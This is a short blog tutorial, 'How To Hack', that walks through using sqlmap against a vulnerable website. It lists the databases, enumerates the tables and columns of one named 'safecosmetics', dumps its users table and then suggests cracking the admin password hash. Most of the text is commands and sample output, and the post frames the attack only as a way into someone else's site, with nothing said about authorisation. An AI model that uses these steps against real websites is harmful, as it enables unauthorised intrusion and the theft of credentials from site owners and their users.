How To Hack: Use SQLmap for Auto SQL Injection and Get Website Admin Password

SQLmap is a wonderful tool for taking the dirty work out of your SQL Injection endeavors. Here is the quick and dirty on how to get that Admin Password.

sql-injectionFinding the Databases on the SQL Server

Once you confirm that a remote url is vulnerable to sql injection and is exploitable, the next step is to find out the names of the databases that exist on the remote system. The “–dbs” option is used to get the database list.

sqlmap -u “” –dbs

The output could be something like this

[*] starting at 12:12:56
[12:12:56] [INFO] resuming back-end DBMS ‘mysql’
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: error-based
Title: MySQL = 5.0 AND error-based – WHERE or HAVING clause
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics

available databases [2]:
[*] information_schema
[*] safecosmetics

The output shows the existing databases on the remote system.

Find the Tables in a Particular Database

Now its time to find out what tables exist in a particular database. Lets say the database of interest over here is ‘safecosmetics’

sqlmap -u “” –tables -D safecosmetics

and the output might be something similar to this:

[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
blah blah blah more tables

isnt this amazing ? it is of course! Lets get the columns of a particular table now.

Get the Columns of One of the Tables

Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Lets say the table is ‘users’ and it contains the username and password.

sqlmap -u “” –columns -D safecosmetics -T users

The output may be something like this:

[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
| Column                    | Type               |
| email                        | text                  |
| hash                          | varchar(128) |
| id                               | int(11)              |
| name                         | text                  |
| password                 | text                  |
| permission                | tinyint(4)        |
| system_allow_only | text                 |
| system_home           | text                 |

So now the columns are clearly visible. Good job!

Get Data from a Table

Now comes the most interesting part, of extracting the data from the table. The command would be

sqlmap -u “” –dump -D safecosmetics -T users

The above command will simply dump the data of the particular table, very much like the mysqldump command.
The output might look similar to this
| id | hash | name | email | password | permission | system_home | system_allow_only |
| 1 | 5DIpzzDHFOwnCvPonu | admin | blank | blank | 3 | blank | blank |
The hash column seems to have the password hash, or other times it will just have the password outright. Try cracking the hash and then you would get the login details rightaway. sqlmap will create a csv file containing the dump data for easy analysis.

Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *